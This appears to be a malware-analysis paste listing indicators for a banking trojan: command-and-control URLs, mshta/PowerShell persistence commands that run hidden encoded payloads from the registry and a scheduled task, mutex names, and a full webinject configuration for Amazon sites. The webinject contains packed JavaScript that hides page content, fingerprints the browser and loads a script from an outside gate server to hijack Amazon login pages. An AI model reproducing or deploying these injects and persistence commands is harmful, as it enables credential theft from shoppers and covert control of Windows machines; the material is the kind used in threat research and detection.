Brownies

POST winmetricanalise.tech/ezawsdefuranyp.jsp
POST winmetricanalise.tech/ahlbutyjfcds.php
POST winmetricanalise.tech/ogsjazkymcrutdhlpx.jsp
POST winmetricanalise.tech/fkjidp/kbxfvuahjs.php

GET winmetricanalise.tech/wasevydu.php
GET winmetricanalise.tech/eluozhxg/rcojxutzave.php

UA:

Persistance
mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -c ""$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion DefenderUpdateID).DefenderUpdateID);powershell -Win Hidden -E $x""",0,True)(window.close)

"C:\Windows\system32\schtasks.exe" /Create /SC ONLOGON /F /TN {6B2FEF84-DFD9-427B-887F-1870FE114892} /TR "C:\Windows\syswow64\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\"powershell.exe -c \"\"$x=(gp HKLM:\Software\Microsoft\Network Netsh).Netsh;powershell -Win Hidden -E $x\"\"\",0,True)(window.close)" /RL HIGHEST

Interesting mutex's:
GetIdDefender
TSLicensingLock

webinjects:
{

   "webinjects":

   [


	{

         "host": "*amazon.*",

         "path": "*",

         "data":

         [

            {

               "inject": "",

               "before": "if (window.ue_csm) {",

               "after": "ue.uels(\"https://images-na.ssl-images-amazon.com/images/G/01/browser-scripts/forester-client/*.js\");"

            },

	          {

               "inject": "return;",

               "before": "",

               "after": "w(a,e)}}function w(a,e){"

            },

	          {

               "inject": "<script>var home_link = \"https://akamaianlisetech.com/analiseamazon\";var gate_link = home_link+\"/gate.php\";var pkey = \"Bc5rw12\";eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}('9 1N(){o a={1r:D,1s:D,1d:D,1t:D},1u;1u=m.Y;H{m.Y=\"\"}O(e){}a.1v=2t m.Y==\"1O\"?!0:2u(\"/*@2v!@*/!1\");H{m.Y=1u}O(e){}7(a.1v){a.1t=(/^(?:.*?[^a-2w-Z])??(?:2x|2y\\\\s*\\\\:)\\\\s*(\\\\d+\\\\.?\\\\d*)/i).1w(11.1e||\"\")?1P(1Q.$1,10):D;o e,1f,x,1x=m.1y(\"2z\"),1z=[\"{2A-1R-1S-1T-1U}\",\"{2B-1R-1S-1T-1U}\",\"{2C-2D-2E-2F-2G}\"];H{1x.1V.2H=\"2I(#2J#2K)\"}O(e){}14(x=0;x<1z.u;x++){H{a.1d=1x.2L(1z[x],\"2M\").2N(/,/g,\".\")}O(e){}7(a.1d)2O}1f=1P(a.1d||\"0\",10);a.1s=m.Y||((/2P/i).1w(m.2Q||\"\")?5:1f)||a.1t;a.1r=1f||a.1s}o b=!!E.2R||11.1e.1W(\\' 2S/\\')>=0;7(/2T/2U.1w(11.1e)){n\"1X\"}w{7(a.1v){n\"2V\"+a.1r}w 7(!b){n\"2W\"}w 7(!!E.2X&&!b){n\"2Y\"}}}o 1A=1N();(9(){\\'2Z 30\\';E.1Y=9(h){o j=1B.1g.1C;o k=1B.1g.P;v.1Z=9(a,b,c){7(a===D)n;7(j&&a.1C===j){a.1C(b,c)}w 7(a.u===+a.u){14(o i=0,l=a.u;i<l;i++){7(b.1h(c,a[i],i,a)==={})n}}w{14(o d 32 a){7(a.33(d)){7(b.1h(c,a[d],d,a)==={})n}}}};v.P=9(d,e,f){o g=[];7(d==D)n g;7(k&&d.P===k)n d.P(e,f);v.1Z(d,9(a,b,c){g[g.u]=e.1h(f,a,b,c)});n g};7(h){v.1D=h}};1Y.1g={34:9(){o c=[];c.I(11.1e);c.I([1E.35,1E.36,1E.37].J(\\'x\\'));c.I(20 1F().38());c.I(!!E.39);c.I(!!E.3a);o d=v.P(11.3b,9(p){o b=v.P(p,9(a){n[a.A,a.3c].J(\\'~\\')}).J(\\',\\');n[p.3d,p.3e,b].J(\\'::\\')},v).J(\\';\\');c.I(d);7(v.1D){n v.1D(c.J(\\'###\\'),31)}w{n v.21(c.J(\\'###\\'),31)}},21:9(a,b){o c,1G,r,1i,Q,3f,R,3g,q,i;c=a.u&3;1G=a.u-c;r=b;Q=3h;R=3i;i=0;22(i<1G){q=((a.G(i)&K))|((a.G(++i)&K)<<8)|((a.G(++i)&K)<<16)|((a.G(++i)&K)<<24);++i;q=((((q&t)*Q)+((((q>>>16)*Q)&t)<<16)))&L;q=(q<<15)|(q>>>17);q=((((q&t)*R)+((((q>>>16)*R)&t)<<16)))&L;r^=q;r=(r<<13)|(r>>>19);1i=((((r&t)*5)+((((r>>>16)*5)&t)<<16)))&L;r=(((1i&t)+3j)+((((1i>>>16)+3k)&t)<<16))}q=0;3l(c){1H 3:q^=(a.G(i+2)&K)<<16;1H 2:q^=(a.G(i+1)&K)<<8;1H 1:q^=(a.G(i)&K);q=(((q&t)*Q)+((((q>>>16)*Q)&t)<<16))&L;q=(q<<15)|(q>>>17);q=(((q&t)*R)+((((q>>>16)*R)&t)<<16))&L;r^=q}r^=a.u;r^=r>>>16;r=(((r&t)*23)+((((r>>>16)*23)&t)<<16))&L;r^=r>>>13;r=((((r&t)*25)+((((r>>>16)*25)&t)<<16)))&L;r^=r>>>16;n r>>>0}}})();o 3m=(9(){9 3n(b){9 y(a){n\"%\"+f.1I(a>>4)+f.1I(a&3o)}o c=\"3p-3q.~\";o d=\"!*\\'();:@&=+$,/?%#[]\";o e=c+d;o f=\"3r\";b=b+\"\";o g=\"\";7(!b||b.u==0){n\"\"}14(o i=0;i<b.u;i++){o h=b.1I(i);7(c.1W(h)!=-1){g=g+h}w{o j=b.G(i);7(j<3s){g=g+y(j)}7(j>3t&&j<3u){g=g+y((j>>6)|3v);g=g+y((j&S)|T)}7(j>3w&&j<3x){g=g+y((j>>12)|3y);g=g+y(((j>>6)&S)|T);g=g+y((j&S)|T)}7(j>3z){g=g+y((j>>18)|3A);g=g+y(((j>>12)&S)|T);g=g+y(((j>>6)&S)|T);g=g+y((j&S)|T)}}}n g}9 26(){7(m.U(\"M\")){m.U(\"M\").27.28(m.U(\"M\"))}o a=\"3B {3C:3D !3E}\";o b=m.1y(\"1V\");b.29(\"A\",\"2a/3F\");b.29(\"2b\",\"M\");7(1A==\"1X\"){b.3G=a}w{7(b.2c){b.2c.3H=a}w{b.1j(m.3I(a))}}m.1k(\"1J\")[0].1j(b)}9 2d(a){a+=\"&3J=\"+1A;o b=m.1y(\"3K\");b.A=\"2a/3L\";b.2b=\"3M\";b.3N=9(){7(m.U(\"M\")){m.U(\"M\").27.28(m.U(\"M\"))}};b.3O=a;7(m.1k(\"1J\").u>0){m.1k(\"1J\")[0].1j(b)}w{m.1k(\"2e\")[0].1j(b)}}9 2f(){2d(E.3P+\"/3Q.3R?3S=\"+2g(20 1F()))}n{3T:9(){2f()},3U:9(){26()}}}());o 3V=(9(){o d,F,B={};B[\"[C 3W]\"]=\"3X\";B[\"[C 2g]\"]=\"1O\";B[\"[C 2h]\"]=\"3Y\";B[\"[C 3Z]\"]=\"9\";B[\"[C 1B]\"]=\"2i\";B[\"[C 1F]\"]=\"40\";B[\"[C 1Q]\"]=\"41\";B[\"[C 2j]\"]=\"C\";o f={1l:V,1m:1,42:9(a){7(a){f.1m++}w{f.z(W)}},z:9(a){7((a===W&&!--f.1m)||(a!==W&&!f.1l)){7(!m.2e){n 1K(f.z,1)}f.1l=W;7(a!==W&&--f.1m>0){n}d.1n(m,[f])}},2k:9(){7(d){n}d=f.2l();7(m.2m===\"2n\"){n 1K(f.z,1)}7(m.1o){m.1o(\"F\",F,V);E.1o(\"43\",f.z,V)}w 7(m.1p){m.1p(\"2o\",F);E.1p(\"44\",f.z);o a=V;H{a=E.45==D}O(e){}7(m.2p.2q&&a){1L()}}},2l:9(){o c=[],N,1a,1q,X={1M:9(){7(!1q){o a=2r,i,u,1b,A,1c;7(N){1c=N;N=0}14(i=0,u=a.u;i<u;i++){1b=a[i];A=f.A(1b);7(A===\"2i\"){X.1M.2s(X,1b)}w 7(A===\"9\"){c.I(1b)}}7(1c){X.1n(1c[0],1c[1])}}n v},1n:9(a,b){7(!1q&&!N&&!1a){b=b||[];1a=1;H{22(c[0]){c.46().2s(a,b)}}47{N=[a,b];1a=0}}n v},48:9(){X.1n(v,2r);n v},49:9(){n!!(1a||N)},4a:9(){1q=1;c=[];n v}};n X},A:9(a){n a==D?2h(a):B[2j.1g.4b.1h(a)]||\"C\"}};9 1L(){7(f.1l){n}H{m.2p.2q(\"4c\")}O(e){1K(1L,1);n}f.z()}7(m.1o){F=9(){m.4d(\"F\",F,V);f.z()}}w 7(m.1p){F=9(){7(m.2m===\"2n\"){m.4e(\"2o\",F);f.z()}}}9 z(a){f.2k();o b=f.A(a);d.1M(a)}n z})();9 4f(){n 4g!=4h?W:V}',62,266,'|||||||if||function|||||||||||||document|return|var||k1|h1||0xffff|length|this|else||gethex|ready|type|class2type|object|null|window|DOMContentLoaded|charCodeAt|try|push|join|0xff|0xffffffff|document_hide_css|fired|catch|map|c1|c2|0x3F|0x80|getElementById|false|true|deferred|documentMode|||navigator|||for||||||firing|elem|_fired|verIEtrue|userAgent|verTrueFloat|prototype|call|h1b|appendChild|getElementsByTagName|isReady|readyWait|resolveWith|addEventListener|attachEvent|cancelled|verIE|docModeIE|verIE_ua|tmp|isIE|test|obj|createElement|CLASSID|browser_type|Array|forEach|hasher|screen|Date|bytes|case|charAt|head|setTimeout|doScrollCheck|done|detectBrowser|number|parseFloat|RegExp|A269|11D1|B5BF|0000F8051515|style|indexOf|FF|Fingerprint|each|new|murmurhash3_32_gc|while|0x85ebca6b||0xc2b2ae35|hideContent|parentNode|removeChild|setAttribute|text|id|styleSheet|loadScript|body|run|Number|String|array|Object|bindReady|_Deferred|readyState|complete|onreadystatechange|documentElement|doScroll|arguments|apply|typeof|eval|cc_on|zA|MSIE|rv|div|45EA75A0|3AF36230|89820200|ECBD|11CF|8B85|00AA005B4383|behavior|url|default|clientcaps|getComponentVersion|componentid|replace|break|back|compatMode|opera|OPR|firefox|im|IE|OP|chrome|CH|use|strict||in|hasOwnProperty|get|height|width|colorDepth|getTimezoneOffset|sessionStorage|localStorage|plugins|suffixes|name|description|c1b|c2b|0xcc9e2d51|0x1b873593|0x6b64|0xe654|switch|iLoader|urlEncode|0xF|0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz|_|0123456789ABCDEFabcdef|128|127|2048|0xC0|2047|65536|0xE0|65535|0xF0|html|display|none|important|css|innerHTML|cssText|createTextNode|bt|script|javascript|jsess_script_loader|onerror|src|home_link|amazon|js|ssid|Run|HideContent|cReady|Boolean|boolean|string|Function|date|regexp|holdReady|load|onload|frameElement|shift|finally|resolve|isResolved|cancel|toString|left|removeEventListener|detachEvent|isFrame|top|self'.split('|'),0,{}));var botid = \"@ID@\";botid = /(ID)/im.test(botid) ? botid = \"%%%BOT_NICK%%%\" : botid;botid = /BOT_NICK/im.test(botid) ? botid = \"%UID%\" : botid;botid = /UID/im.test(botid) ? botid = \"<%IDBOT%>\" : botid;botid = /IDBOT/im.test(botid) ? botid = new Fingerprint().get() : botid;if(!isFrame() && /amazon\\.(com|fr|de|ca|it|co\\.jp)/im.test(top.location.href)){iLoader.HideContent();cReady(function(){iLoader.Run()});}else if(isFrame() && document.getElementById(\"ap_email\")){top.location.href = self.location.href;}</script>",

               "before": "",

               "after": "<head*>"

            }

         ]

      }

   ]

}